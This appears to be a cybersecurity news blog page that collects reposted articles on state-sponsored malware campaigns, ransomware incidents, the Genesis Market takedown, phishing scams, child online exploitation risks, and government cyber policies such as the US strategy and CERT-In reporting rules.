Search This Blog

Showing posts with label Cyber Data. Show all posts

Kimsuky Hackers from North Korea Back in Action with Advanced Reconnaissance Malware

 

Kimsuky, a North Korean APT outfit, has been discovered deploying a piece of bespoke malware named RandomQuery as part of a reconnaissance and information exfiltration operation.

"Lately, Kimsuky has been consistently distributing custom malware as part of reconnaissance campaigns to enable subsequent attacks," Aleksandar Milenkoski and Tom Hegel of SentinelOne noted in a report published.

According to the cybersecurity firm, the current targeted campaign is particularly aimed at information services as well as organizations supporting human rights advocates and North Korean defectors.
Kimsuky, who has been active since 2012, has demonstrated targeting patterns that correspond to North Korea's operational directives and priorities.

As SentinelOne disclosed earlier this month, the information collection missions have featured the employment of a broad assortment of malware, including another reconnaissance program named ReconShark.

The group's most recent activity cluster began on May 5, 2023, and employs a form of RandomQuery that is specially tailored to enumerate files and siphon sensitive data.

RandomQuery, along with FlowerPower and AppleSeed, are among the most widely disseminated tools in Kimsuky's arsenal, with the former acting as an information stealer and a conduit for the distribution of remote access trojans such as TutRAT and xRAT.

The attacks begin with phishing emails purporting to be from Daily NK, a famous Seoul-based online daily covering North Korean events, in order to convince potential targets to open a Microsoft Compiled HTML Help (CHM) file.

It's worth noting at this point that CHM files have also been used as a lure by ScarCruft, another North Korean nation-state actor. When the CHM file is launched, a Visual Basic Script is executed, which sends an HTTP GET request to a remote server to receive the second-stage payload, a VBScript flavor of RandomQuery.

The virus then proceeds to collect system metadata, running processes, installed apps, and files from various folders, which are all sent back to the command-and-control (C2) server.
"This campaign also demonstrates the group's consistent approach of delivering malware through CHM files," the researchers said.

"These incidents underscore the ever-changing landscape of North Korean threat groups, whose remit not only encompasses political espionage but also sabotage and financial threats."

The discoveries come only days after the AhnLab Security Emergency Response Centre (ASEC) discovered Kimsuky's watering hole assault, which comprises putting up a mimic webmail system used by national policy research organizations to capture credentials entered by victims.

Kimsuky has also been linked to attacks that weaponize vulnerable Windows Internet Information Services (IIS) servers in order to drop the Metasploit Meterpreter post-exploitation framework, which is then used to spread Go-based proxy malware.

Industrial Espionage: Here's All You Need to Know

 

Cyberattacks are actively guarded against by all responsible firms. However, one security concern that many firms ignore is industrial espionage. Industrial espionage and cyberattacks are frequently carried out for the same reason: to steal confidential information. 

Industrial espionage, on the other hand, is carried out by a corporate competitor rather than a random hacker. Industrial espionage is the theft of confidential information from a company in order to gain a competitive edge. It can take many forms, but the most sophisticated attacks include an employee of the company being targeted. A rival may try to hire someone at the target company, or they may approach an existing employee and offer them money in exchange for information.

Competitive Intelligence vs. Industrial Espionage

Competitive intelligence and industrial espionage are not the same thing. Both methods entail gathering information about the competition. Competitive intelligence, on the other hand, is only conducted legally. A company performing competitive intelligence takes advantage of publicly available information on the internet. It does not include any kind of surveillance or unlawful conduct. Industrial espionage entails gathering any knowledge that may be profitable.

Industrial espionage targets any information that could be profitable, such as upcoming product details, financial information, client lists, and marketing strategies. Obtaining such information can provide a competitive edge by allowing a business to improve its own products, offer better deals to providers and employees, undercut prices, damage reputation, or copy and release similar marketing strategies. Client information can also be used to identify potential customers and pricing strategies and marketing information can be used to promote similar products or compete with effective strategies.

In order to protect against industrial espionage, all businesses should take the following precautions.
  • Invest in Cybersecurity
  • Encrypt All Private Data
  • Increase Physical Security
  • Require Confidentiality Agreements
  • Prevent Insider Threats
Most businesses should protect themselves against industrial espionage. Every company has information that could be useful to its competition. There are also numerous ways it might be stolen. While insider threats are the most effective means to steal information, physical trespassing is frequently simple and effective. Cyberattacks are another formidable tool that certain competitors may use.

To protect against industrial espionage, all firms should be cautious about who they hire, keep an eye out for displeased employees, secure physical locations, and adopt cybersecurity.

FBI Obtained Detailed Database Exposing 59K+ Users of the Cybercrime Genesis Market

 

In its takedown of Genesis Market, a site famous in the cybercriminal realm for selling access to user accounts, the FBI gathered information on possibly tens of thousands of hackers. Senior FBI and Justice Department officials stated in a Wednesday briefing that law enforcement found and duplicated the backend servers for Genesis Market's main site. These servers store stolen victim passwords and session cookies, as well as information on customers of the infamous hacking site. 

According to a US official, the server copies contain information about around 59,000 individual user accounts, including usernames, passwords, email addresses, and secure messenger accounts, as well as a history of user activity.

In connection with the site's closure, the FBI and its partners have already made 119 arrests, including 24 in the United Kingdom. However, the information obtained from the server seizures could assist law enforcement in apprehending even more criminals. 

The Justice Department admits that some of the apprehended suspects are US citizens, but it is unable to provide a precise figure. US officials are also reluctant to clarify whether any Genesis Market leaders had been arrested. The Treasury Department, on the other hand, stated that the hacker site "is believed to be located in Russia," a country that has traditionally refused to extradite criminal suspects to the United States. 

As a result, the primary operators of Genesis Market are likely to have escaped arrest and will attempt to resume their operations. The FBI has taken down the marketplace's primary domain. The dark web onion site for Genesis, on the other hand, is still active.

For the time being, US officials have only stated that they are focusing on capturing the site's leaders and putting pressure on the cybercriminal globe. The takedown comes just weeks after authorities shut down another prominent hacker forum, BreachForums. In doing so, the FBI said that it had gotten a backend database for BreachForums, which is likely to contain information on several hackers.  

“Each takedown is yet another blow to the cybercrime ecosystem,” US Deputy Attorney General Lisa Monaco said in today’s announcement.

ALPHV Ransomware Affiliate Targets Vulnerable Backup Installations to Gain Initial Access

 

An ALPHV/BlackCat ransomware affiliate was spotted gaining early access to the target network by abusing three flaws in the Veritas Backup product. The ALPHV ransomware operation first appeared in December 2021, and it is thought to be controlled by former members of the Darkside and Blackmatter programs, which shut down abruptly to avoid law enforcement scrutiny. 

Mandiant identifies the ALPHV affiliate as 'UNC4466,' noting that the method differs from the conventional breach, which depends on stolen credentials. Mandiant reports that on October 22, 2022, it spotted the first occurrences of Veritas flaw exploitation in the field. UNC4466 focuses on the following high-severity flaws:
  • CVE-2021-27876: Arbitrary file access flaw caused by an error in the SHA authentication scheme, allowing a remote attacker to gain unauthorized access to vulnerable endpoints. (CVSS score: 8.1)
  • CVE-2021-27877: Remote unauthorized access and privileged command execution to the BE Agent via SHA authentication. (CVSS score: 8.2)
  • CVE-2021-27878: Arbitrary command execution flaw result of an error in the SHA authentication scheme, allowing a remote attacker to gain unauthorized access to vulnerable endpoints. (CVSS score: 8.8)
The Veritas Backup software is affected by all three issues. They were disclosed by the vendor in March 2021, and a remedy was published with version 21.2. Despite the fact that it has been over two years, many endpoints remain vulnerable since they have not been updated to a safe version.

According to Mandiant, a commercial scanning service discovered more than 8,500 IP addresses on the public web advertising the "Symantec/Veritas Backup Exec ndmp" service on the default port 10000 as well as ports 9000 and 10001.

"While this search result does not directly identify vulnerable systems, as the application versions were not identifiable, it demonstrates the prevalence of Internet exposed instances that could potentially be probed by attackers" - Mandiant

On September 23, 2022, a Metasploit module to exploit these flaws was made available to the public. The code enables attackers to establish a session and interact with the compromised endpoints. According to Mandiant, UNC4466 began using the specific module a month after it was released.

Specifics of the attack

According to Mandiant's findings, UNC4466 compromises an internet-exposed Windows server running Veritas Backup Exec by utilizing the publicly accessible Metasploit module and gains persistent access to the host.

Following the first compromise, the threat actor gathered information on the victim's surroundings using the Advanced IP Scanner and ADRecon utilities.  Next, they downloaded  more tools on the host like LAZAGNE, LIGOLO, WINSW, RCLONE, and ultimately the ALPHV ransomware encryptor through the Background Intelligent Transfer Service (BITS).

To interact with the command and control server, the threat actor employed SOCKS5 tunneling. (C2). According to the researchers, UNC4466 used BITS transfers to download SOCKS5 tunneling tools before deploying the ransomware payload by adding immediate tasks to the default domain policy, disabling the security software, and executing  encryptors.

UNC4466 uses Mimikatz, LaZagne, and Nanodump to steal valid user credentials in order to escalate privileges. Finally, the threat actor avoids discovery by erasing event logs and turning off Microsoft Defender's real-time monitoring capability.

Mandiant's report gives recommendations for defenders to take in order to detect and prevent UNC4466 assaults before the ALPHV payload is executed on their systems.

To Safeguard Children from Exploitation, Parents Should Reconsider Approach to Online Behaviour

 

Raising children in the digital age is becoming particularly complex. Many young people are growingly reliant on screens for social interaction. They experiment with new media sharing platforms such as TikTok, Snapchat, and BeReal, but without necessarily considering long-term consequences. 

This is normal because children's prefrontal cortex, the part of the brain responsible for reasoning, decision-making, and impulse control, is still underdeveloped. Parents who are responsible for anticipating the outcomes of digital interactions are overwhelmed. Many parents may lack the digital literacy to guide their children through today's plethora of social media platforms, messaging apps, and other online platforms. This situation may expose children to online sexual exploitation. 

They collected data from a diverse group of experts in the United States and the United Kingdom for our study. Interviews were conducted with internet safety non-profits, safeguarding teams, cybercrime police officers, digital forensics staff, and intelligence directors. The ability to share explicit content online is a major reason for the rapid escalation of online child sexual exploitation. The research unveiled four distinct stages used by perpetrators.

In Stage 1, perpetrators use various technological tools and networks to initiate contact with potential victims, such as social media, messaging apps, games, and online forums. They frequently create false identities by using fake images to create convincing digital personas through which they approach children, such as posing as a "new kid on the block" looking for new friends.

In Stage 2, perpetrators use tactics such as impersonating a similar-aged child to gain the trust of potential victims. This can occur over a long period of time. In one case we investigated, a 12-year-old boy in Lee County, North Carolina, received 1,200 messages from the same perpetrator over the course of two years. Offenders may send their own explicit images during this stage to reduce a victim's suspicion.

In Stage 3, the perpetrators resort to online extortion. They modify innocent photos or use photographs provided by victims to make them appear sexual or pornographic. Perpetrators then send these images to their victims in order to keep them in a state of humiliation. When perpetrators threaten to share these humiliating images with the victim's friends, teachers, or family unless their victims send more explicit photos or videos, the situation escalates.

At this point, many extortion techniques and direct threats are being used. It's difficult to imagine the psychological strain this can put on children. Before seeking help, a 12-year-old girl uploaded 660 sexually explicit images of herself to a cloud-based storage account controlled by a 25-year-old perpetrator.

In Stage 4, perpetrators begin selling these images on peer-to-peer networks, the dark web, and even child pornographic websites.

Defending against online exploitation

Parents can help prevent exploitation by avoiding common mistakes. By sharing these, parents, policymakers, school boards, and even children will reconsider their approach to online behavior.
 
1. "That will never happen to us!" Many victims and their families are victims of optimism bias, believing that bad things will never happen to them. Online crimes, on the other hand, can affect anyone. Unfortunately, these occurrences are more common than most people realise. No family is immune to the dangers of the online world.

2. "Everyone's doing it!" It is now common for parents to overshare pictures of their children on social media. Many parents find it difficult to resist the pressure or temptation to post photos of their children on social media. These photographs are frequently edited and distorted to appear pornographic. Everyone in the family must resist the urge to overshare photos on social media.

3. "It doesn't bother my kids!" Many children today have a digital presence that their parents initiated and maintain without their consent. This disregard for children's privacy not only undermines their autonomy, but it can also have long-term consequences for their self-esteem, personal and professional future, and parent-child relationship.

4. "We are unable to keep up with their technology!" When they can't keep up with their children, many parents feel overwhelmed and intimidated. As technology continues to play an important role in children's lives, parents' digital literacy must be improved through online resources and schools. Parents must seek and receive assistance in understanding the technology that their children use.

5. "They're just online chatting with friends!" Parents may be very involved and interested in who their children talk to on the way home from school or at friends' houses, but they may not be as aware of who their children talk to online. Just as they are interested in their child's real-world interactions, the benefits and risks of online behavior must be an important and frequent topic of discussion.

Online child sexual exploitation is a serious and multifaceted problem that requires our undivided attention. We can only hope to prevent children from becoming victims of these crimes if we carefully consider these critical concerns.

McAfee Invoice Fraud Email Pretending to be a Subscription Renewal Receipt

 

Readers should beware of clicking links in a McAfee invoice scam email that claims to be a "confirmation receipt" for the subscription renewal of the company's products. This email does not come from McAfee Corp. Email scams that use the names of antivirus and security companies are probably as old as the internet, but this particular one for McAfee apparently tried to combine two different threats into one: malware and phishing. 

Snopes reviewed one of the McAfee invoice scam emails. The subject line read, "Confirmation Receipt ID.6030955553." The following message came from an email address associated with uilsducoach.com, not the official company website mcafee.com:
  • Reassure your McAfee is up to date.
  • Check now as it may have ended.
  • Your subscription of McAfee for your computer may ended soon.
  • After the ending date has passed your computer will become susceptible to many different virus and threats.
  • Your PC might be unprotected, it can be exposed to viruses and other malware...
  • You are eligible for discount: -70%*
A malicious URL scanner scan of the links revealed that the email was "hosting malware" and contained a "phishing link."

The link started on an Amazon Web Services page. Vestingsupper.com was one of the redirects. More information was not available at the time this story was published. McAfee has previously published several articles about these types of scams, including details on what to do if you believe you've been a victim of one.

It's recommended, "if you accidentally enter data in a webpage linked to a suspicious email, perform a full malware scan on your device. Once the scan is complete, backup all of your files and change your passwords. Even if you only provided a phishing scammer with the data from one account, you may have also opened the door to other personal data, so it's important to change all the passwords you use online in the wake of a suspected phishing attack."

Malwarebytes and Norton are two other companies that are recommended for malware scans. If readers provided financial information to scammers, such as a credit card number, we recommend contacting that financial institution right away to notify them of the problem. To ensure that scammers do not use the compromised card in the future, a new credit card with a new number may need to be mailed to you in some cases.

The United States has Released its National Cybersecurity Strategy: Here's What you Need to Know

 


The US government is taking steps to enhance the country's cybersecurity capabilities and improve its overall technology governance strategy. President Joe Biden recently unveiled a new National Cybersecurity Strategy aimed at securing cyberspace and building a resilient digital ecosystem that is easier to defend than to attack. 

"When we pick up our smartphones to keep in touch with loved ones, log on to social media to share our ideas with one another, or connect to the internet to run a business or take care of any of our basic needs, we need to be able to trust that the underlying digital ecosystem is safe, reliable and secure," Biden wrote in the framework's preface.

The strategy is part of a broader effort by the Biden administration to reinforce cyber and technology governance, which includes increasing accountability for tech firms, strengthening privacy protections, and ensuring fair competition online.

Why does the United States require a National Cybersecurity Strategy?

The world is becoming more complex, and cyber threats are becoming more sophisticated, with ransomware attacks causing millions of dollars in economic losses in the United States. According to IBM, the average cost of a ransomware attack in 2022 will be more than $4.5 million. The greatest threats we face are interconnected, raising the prospect of a "polycrisis," in which the overall combined impact of these events exceeds their individual impact.

This is also true of technological risks, where attacks on critical information infrastructure, for example, could have disastrous consequences for public infrastructure and health, or where rising geopolitical tensions increase the risk of cyberattacks.

Cybercrime and cyber insecurity were ranked eighth in terms of severity of impact by risk experts polled for the World Economic Forum's Global Risks Report, both in the short term (the next two years) and over the next decade. According to Google data, state-sponsored cyberattacks targeting NATO users increased by 300% in 2022 compared to 2020. With cyberattacks on the rise, experts at the World Economic Forum's Annual Meeting at Davos predicted that 2023 would be a "busy year" for cyberspace with a "gathering cyber storm".

“This is a global threat, and it calls for a global response and enhanced and coordinated action,” Jürgen Stock, Secretary-General of the International Criminal Police Organization (INTERPOL), said at Davos.

According to the Forum's Global Cybersecurity Outlook 2023, 93% of cybersecurity experts and 86% of business leaders believe global instability will have a negative impact on their ability to ensure cybersecurity in the future.

As Biden notes, "Cybersecurity is essential to the basic functioning of our economy, the operation of our critical infrastructure, the strength of our democracy and democratic institutions, the privacy of our data and communications, and our national defense.

"We must ensure the internet remains open, free, global, interoperable, reliable, and secure – anchored in universal values that respect human rights and fundamental freedoms."

What are the National Security Strategy's five pillars?

Because the COVID-19 pandemic has accelerated the world's digital transformation, we rely on connected devices and digital technology to do more than ever before, putting our lives and livelihoods at greater risk from cyber threats.

The US National Security Strategy recognizes the need to rebalance the burden of responsibility for cybersecurity away from small businesses and individuals and onto the public and private organizations best placed to defend cyberspace through "robust collaboration".

It also aims to strengthen cyberspace resilience by balancing the need to address immediate threats with incentivizing investment in the digital ecosystem's secure, long-term future. Each of the five pillars it establishes is divided into strategic objectives, but here's a quick rundown of what they entail:

1. Defend critical infrastructure
2. Disrupt and dismantle threat actors
3. Shape market forces to drive security and resilience
4. Invest in a resilient future
5. Forge international partnerships to pursue shared goals


The LockBit Ransomware Takes Responsibility for the Royal Mail Cyberattack

 

The LockBit ransomware operation has asserted responsibility for the cyberattack on Royal Mail, the UK's leading mail delivery service, which forced the company to stop its international shipping services due to "severe service disruption." 

This emerges after LockBitSupport, the public-facing representative of the ransomware group, earlier told BleepingComputer that the LockBit cybercrime group did not target Royal Mail. They instead blamed the attack on other threat actors who used the LockBit 3.0 ransomware builder, which was leaked on Twitter in September 2022. LockBitSupp did not clarify why printed Royal Mail ransom notes seen by BleepingComputer included links to LockBit's Tor negotiation and data leak sites rather than those operated by a different threat actor.

However, LockBitSupp validated LockBit's involvement in the attack in a post on a Russian-language hacking forum after discovering that one of their affiliates deployed the gang's ransomware payloads on Royal Mail's systems.

The representative of the ransomware gang also stated that they would only provide a decryptor and delete data stolen from Royal Mail's network after a ransom was paid. The entry for the Royal Mail attack on LockBit's data leak site currently states that stolen data will be published online on Thursday, February 9, at 03:42 AM UTC.

The attack was termed a "cyber incident"

On January 10, Royal Mail discovered the attack and hired outside forensic experts to assist with the investigation.

A Royal Mail spokesperson told BleepingComputer on January 11 when we reached out for more details, "Incident was detected yesterday, UK/ domestic mail remains unaffected."

"We're experiencing disruption to our international export services and are temporarily unable to despatch items to overseas destinations. Please do not post any export items while we work to resolve the issue. Sorry for any disruption this may cause," the company tweeted.

The incident was also reported to UK security agencies, and the company is investigating it alongside the National Crime Agency and the UK National Cyber Security Centre (NCSC).

However, Royal Mail has yet to acknowledge that it is the victim of a ransomware attack, which could result in a data breach because LockBit ransomware operators are known for stealing data and leaking it online if their ransom demands are not met.

For the time being, the company is still referring to the attack as a "cyber incident" and claims to have restored some of the services that were impacted by the attack. The incident last month follows a November 2022 outage that caused the Royal Mail's tracking services to be unavailable for more than 24 hours.

The Royal Mail's recurring IT problems come at a time when its mailing services are already under strain due to planned national strikes and ongoing talks with the Communication Workers Union.     

Trojanized Windows 10 Installer Utilized in Cyberattacks Against Ukrainian Government Entities

 

Ukraine's government has been compromised as part of a new campaign that used trojanized versions of Windows 10 installer files to conduct post-exploitation activities. The malicious ISO files were distributed via Ukrainian and Russian-language Torrent websites, according to Mandiant, which discovered the "socially engineered supply chain" attack around mid-July 2022. The threat cluster is identified as UNC4166. 

"Upon installation of the compromised software, the malware gathers information on the compromised system and exfiltrates it," the cybersecurity company said in a technical deep dive published Thursday.

Even though the origin of the adversarial collective is unknown, the disruptions are said to have targeted organisations that had previously been victims of disruptive wiper attacks blamed on APT28, a Russian state-sponsored actor. According to the Google-owned threat intelligence firm, the ISO file was designed to disable telemetry data transmission from the infected computer to Microsoft, install PowerShell backdoors, and block automatic updates and licence verification.

The main objective of the operation appears to have been data gathering, with additional implants deployed to the machines only after an initial reconnaissance of the vulnerable environment to determine if it contained valuable intelligence.

Stowaway, an open source proxy tool, Cobalt Strike Beacon, and SPAREPART, a lightweight backdoor written in C that enables the threat actor to execute commands, harvest data, capture keystrokes and screenshots, and export the data to a remote server, were among them.

The malicious actor attempted to download the TOR anonymity browser onto the victim's device in some cases. While the precise reason for this action is unknown, it is suspected that it served as an alternative exfiltration route.

SPAREPART, as the name suggests, is considered to be redundant malware that is used to uphold remote access to the system if the other methods fail. It also has the same functionality as the PowerShell backdoors that were dropped early in the attack chain.

"The use of trojanized ISOs is novel in espionage operations and included anti-detection capabilities indicates that the actors behind this activity are security conscious and patient, as the operation would have required a significant time and resources to develop and wait for the ISO to be installed on a network of interest," Mandiant stated.

The findings come as Check Point and Positive Technologies revealed attacks on the government sector in Russia, Belarus, Azerbaijan, Turkey, and Slovenia by an espionage group known as Cloud Atlas as part of a persistent campaign.

The hacking group, which has been active since 2014, has a history of targeting entities in Eastern Europe and Central Asia. However, the outbreak of the Russo-Ukrainian war earlier this month has shifted its focus to organisations in Russia, Belarus, and Transnistria.

"The actors are also maintaining their focus on the Russian-annexed Crimean Peninsula, Lugansk, and Donetsk regions," Check Point said in an analysis last week.

The adversary's attack chains typically utilise phishing emails with bait attachments as the initial intrusion vector, leading to the delivery of a malicious payload via an intricate multi-stage sequence. The malware then contacts an actor-controlled C2 server to obtain additional backdoors capable of stealing files with specific extensions from the compromised endpoints.

Check Point's observations, on the other hand, culminate in a PowerShell-based backdoor known as PowerShower, which was first discovered by Palo Alto Networks Unit 42 in November 2018. Some of these intrusions in June 2022 were also successful, allowing the threat actor to achieve full network access and use tools such as Chocolatey, AnyDesk, and PuTTY.

"With the escalation of the conflict between Russia and Ukraine, their focus for the past year has been on Russia and Belarus and their diplomatic, government, energy and technology sectors, and on the annexed regions of Ukraine," Check Point added.

Cloud Atlas, also known as Clean Ursa, Inception, Oxygen, and Red October, is still unidentified, joining the ranks of other APTs such as TajMahal, DarkUniverse, and Metador. The group's name derives from its reliance on cloud services such as CloudMe and OpenDrive to host malware.

Absence of Cybersecurity Expertise Affects Public-Safety Organizations

 

Cybersecurity threats have become pervasive for police departments, first responders, and other public-safety organizations, with 93% of organizations reporting a cybersecurity incident in the previous year. According to a report published on December 8 by cloud platform provider Mark43, which was based on a survey of 343 first responders. 

Based on the 2023 U.S. Public Safety Trends Report, 76% of first responders are concerned about the vulnerability of their IT systems to ransomware attacks and data breaches. Simultaneously, the vast majority of first responders must deal with outdated technology and disconnected systems, with 68% of public-safety officers required to file paperwork from the office rather than in the field, and 67% of first responders experiencing issues with inefficient technology, according to the report.

"These agencies in many cases do not have a dedicated security staff who can worry about these issues all day, ensuring that data is backed up and running vulnerability scans," he says. "To the the [cybersecurity] community, these are table stakes — you need to be doing patching, you need to be doing vulnerability scanning ... but these agencies are realizing that they cannot protect themselves from these risks on their own."

While technology can help fix many of the problems that presently afflict first responders, most state and local agencies lack the technical expertise to protect such technology from threats, as per Larry Zorio, chief information security officer for Mark43, which provides information systems for law enforcement and first responder agencies.

In 2021, the FBI warned that the Conti cybercriminals group had targeted at least 16 healthcare and first responder networks with ransomware. A ransomware attack disrupted 911 service in Suffolk County, New York in September 2022.

First Responders are being targeted

According to the FBI's 2021 advisory, these attacks pose additional risks to citizens.

"Cyberattacks targeting networks used by emergency services personnel can delay access to real-time digital information, increasing safety risks to first responders and could endanger the public who rely on calls for service to not be delayed," the advisory stated. "Loss of access to law enforcement networks may impede investigative capabilities and create prosecution challenges."

Ransomware attacks, in general, are expected to continue at the same rate, according to information technologists. According to a study commissioned by Ransomware.org, the vast majority of IT professionals (84%) see ransomware as a significant threat to businesses. Furthermore, 41% of IT professionals believe their company will be a target this year, while 43% believe the threat will remain the same.

The cybersecurity concerns of first responders are not unwarranted. In 2019 and 2020, ransomware groups intensified their attacks on state, local, tribal, and territorial (SLTT) government agencies. In 2019, for example, a coordinated ransomware attack on 22 town agencies and local government organizations disrupted citizen services. Ransomware attacks on local school systems impacted at least 753,000 students in 2019 and 1.2 million in 2020, according to the National Center for Education Statistics.

For first responders, cybersecurity threats must be balanced against the slow adoption of technology that could improve the efficiency of their jobs and operations. While the majority of first responders believe that an integrated reporting system would streamline operations, according to the Mark43 survey, only a quarter of first responder organizations (27%) have moved to the cloud — the other two-thirds have not.

According to the Mark43 survey, compliance and data transparency are also major concerns for first responders, with 86% of respondents requesting improved crime reporting and two-thirds requesting more public transparency.

The agencies must prioritize roles in technology, data management, and cybersecurity. Instead, cybersecurity is frequently delegated to untrained IT personnel within the department or to officers nearing retirement, according to Zorio.

"I don't feel that officers, who are trying to serve our communities, the fact that they are worried about that every day is definitely a concern," he says. "The industry in general needs to help them where we can, because it is not their job to worry about cybersecurity."

Based on the survey, cybersecurity issues include both malicious cybercriminal attacks and availability issues caused by attacks.

Vanuatu Officials Resort to Phone Books and Typewriters, One Month After Cyberattack

 

One month after a cyber-attack brought down Vanuatu's government servers and websites, frustrated officials were still using private Gmail accounts, personal laptops, pen and paper, and typewriters to run the government of Prime Minister Ishmael Kalsakau, who took office just a few days after the crash.

Malware attacks on state networks have slowed communication and coordination in the Pacific island nation of 314,000 people spread across 80 islands. To find government phone numbers, people turned to the online Yellow Pages or the hard copy phone directory. Some offices were operating solely through their Facebook and Twitter pages.

According to a financial analyst who works closely with the ministry's cybersecurity teams, the problems began about a month ago, when suspicious phishing activity was first detected in emails to the Ministry of Finance.

Almost all government email and website archives were destroyed by malware. Many departments were still storing data on local computer drives rather than web servers or the cloud. There has been no official word on whether or not the hackers demanded a ransom.

“It is taking longer for payments [from the Ministry of Finance] to get out, but … we are always on Vanuatu time anyway,” stated the financial analyst.

Government departments have struggled to stay connected, frustrating officials, with spontaneous solutions for communication between agencies and departments being implemented. Many government offices on the outer islands are experiencing significant service delays.

“It was chaos during the first few days but the entire government made alternative Gmail accounts or used their private emails. We are all using telephones and mobile phones for communication. But we are resilient in Vanuatu as a small country and can manage this,” said Olivia Finau, a communications officer in the Ministry of Climate Change. “Our department is communicating with the public more now with Facebook and Twitter, and we are actually getting more followers.”

The attack did not cause any disruptions to civilian infrastructures, such as airline or hotel websites. The majority of tourism and business has continued as usual through the busy Christmas and New Year's seasons.

According to the analyst, the current system can be improved by upgrading software and storing files in the cloud for management. However, local officials lack the necessary expertise and "require outside assistance."

The government had previously reported that the attack took place on November 5, but a computer technician at the Office of the Government's Chief Information Officer and a foreign diplomat confirmed to the Guardian that the crash took place on October 30.

In the early days of the crisis, some Vanuatu authorities blamed the problem on bad weather, which damaged the internet infrastructure.

However, the diplomat said: “We noticed there was a problem right away … our team recognized this as having the hallmarks of a cyber-attack, and not being caused by weather.”

Internal communication breakdowns in the days following the attack exacerbated matters. On November 4, Prime Minister Kalsakau formally took office, and on November 5, the government formally acknowledged the problem. 

The Australian government has offered assistance. "We sent a team in to assist with that disgraceful cyber-attack and response, and we are working through the process of bringing the government IT systems back up to speed," Pat Conroy, Australia's minister for international development and the Pacific, told Vanuatu Daily.

Cyber-attacks have wreaked havoc around the world in recent years, and Vanuatu's attack will serve as a warning to small Pacific nations with even weaker cybersecurity than Port Vila. Requests for comment were not returned by the Vanuatu Office of the Government Chief Information Officer (OGCIO).

Microsoft Announces the Microsoft Supply Chain Platform

 

Software as a Service (SaaS) applications from Microsoft that combine artificial intelligence, collaboration, low-code, security, and supply chain management have been launched as the Microsoft Supply Chain Platform.

Dynamics 365, Microsoft Teams, Power BI, Power Automate, Power Apps, Azure Machine Learning,
Azure Synapse Analytics, Azure IoT, the Microsoft Intelligent Data Platform, Azure Active Directory,
Defender for IoT and Microsoft Security Services for Enterprise are among the Microsoft
applications and platforms in this group.
 
Microsoft's PowerApps low-code development platform is intended to let users create a connected supply chain. It enables supply chain information, supply and demand insights, performance tracking, supplier management, real-time collaboration, and demand management to lessen risk.

Additionally, it addresses order tracking and traceability, pricing management, warehouse
management, and inventory optimization. According to Microsoft, businesses are suffering from an overabundance of petabytes of data that are dispersed among legacy systems, enterprise resource planning (ERP) software, and custom solutions, giving them a fragmented view of their supply chain.

The Microsoft Supply Chain Center preview has also been released by Microsoft. It promises to track global events that may impact a customer's supply chain, coordinate actions across a supply chain, and use AI to lessen supply and demand mismatches. According to Microsoft, this constitutes the foundation of the supply chain platform.

"Although supply chain disruption is not new, its complexity and the rate of change are outpacing organizations' ability to address issues at a global scale. Many solutions today are narrowly focused on supply chain execution and management and are not ready to support this new reality," said Charles Lamanna, corporate vice president, of Microsoft Business Applications and Platform, in a press release.

"Businesses are dealing with petabytes of data spread across legacy systems, ERP, supply chain management and point solutions, resulting in a fragmented view of the supply chain," Lamanna stated. 

"Supply chain agility and resilience are directly tied to how well organizations connect and orchestrate their data across all relevant systems. The Microsoft Supply Chain Platform and Supply Chain Center enable organizations to make the most of their existing investments to gain insights and act quickly." 

Even though it wants to serve as a platform for the entire supply chain, it will continue to collaborate with businesses like Accenture, Avanade, EY, KPMG, PwC, and TCS. Data from standalone supply chain systems, SAP and Oracle ERP systems, Dynamics 365, and other systems will be fed into the Microsoft Supply Chain Center.

Data ingestion for supply chain visibility is made possible via the Supply Chain Center's Data Manager capability. FedEx, FourKites, Overhaul, and C.H. Robinson are some of the partners in the preview launch. The supply and demand insights module, the order management module, the built-in Teams connection, and partner modules within the center are just a few of the prebuilt modules that the Supply Chain Center provides to solve supply chain disruptions.

According to Microsoft, the data remains consistent regardless of the module used because the center runs on a Dataverse common data service environment, eliminating the need to check which reports have the most recent data.

The ALMA Observatory has Suspended Operations due to a Cyberattack

 

Following a cyberattack on Saturday, October 29, 2022, the Atacama Large Millimeter Array (ALMA) Observatory in Chile has suspended all astronomical observation operations and taken its public website offline. 

Email services are currently limited at the observatory, and IT specialists are working to restore the affected systems. The organization announced the security incident on Twitter yesterday, saying that given the nature of the incident, it is impossible to predict when normal operations will resume.

The observatory also stated that the attack did not compromise the ALMA antennas or any scientific data, indicating that no unauthorized data access or exfiltration occurred. In an attempt to learn more about the security incident, BleepingComputer contacted ALMA Observatory, and a spokesperson shared the following comment:

"We cannot further discuss the details as there is an ongoing investigation. Our IT team was prepared to face the situation and had the proper infrastructure, although there is no flawless defense against hackers. We are still working hard on the full recovery of services. Thanks for your understanding." - ALMA Observatory.

The ALMA observatory is made up of 66 high-precision radio telescopes of 12 m diameter arranged in two arrays and is located on the Chajnantor plateau at an elevation of 5,000 m (16,400 ft). The project cost $1.4 billion, making it the most expensive ground telescope in the world, and it was created through a collaborative effort involving the United States, Europe, Canada, Japan, South Korea, Taiwan, and Chile.

Since its normal operational status in 2013, ALMA has contributed to a pioneering comet and planetary formation studies, participated in the Event Horizon project to photograph a black hole for the first time in history, and detected the biomarker 'phosphine' in Venus' atmosphere.

The observatory is used by scientists from the National Science Foundation, the European Southern Observatory, the National Astronomical Observatory of Japan, and other organizations from around the world, so any interruption in operations has ramifications for multiple science teams and ongoing projects.

For the time being, users should keep an eye out for status updates on the NRAO's website or the ALMA Observatory's social media channels. Observers can seek assistance from the organization by using this online portal.

All Organisations Must Report Cybersecurity Beaches Within 6 Hours: CERT-In

 

CERT-In, India's computer, and emergency response team released new guidelines on Thursday that mandate that service providers, intermediaries, data centres, and government institutions disclose cybersecurity incidents, including data breaches, within six hours.

The government said in a release, "Any service provider, intermediary, data center, body corporate and Government organization shall mandatorily report cyber incidents [...] to CERT-In within six hours of noticing such incidents or being brought to notice about such incidents."

Compromise of critical systems, targeting scanning, unauthorised access to computers and social media accounts, website defacements, malware deployments, identity theft, DDoS attacks, data breaches and leaks, rogue mobile apps, and attacks against servers and network appliances such as routers and IoT devices are among the types of incidents covered.

The government stated  it was taking these steps to ensure that the required indicators of compromise (IoC) associated with security events are easily accessible to "carry out the analysis, investigation, and coordination as per the process of the law”

Concerned organisations are also required to synchronise ICT system clocks to the National Informatics Centre (NIC) or National Physical Laboratory (NPL) Network Time Protocol (NTP) Server, maintain ICT system logs for a rolling period of 180 days, and necessitate VPN service providers to maintain data such as names, addresses, phone numbers, emails, and IP addresses of subscribers for a minimum of five years, according to the guidelines.

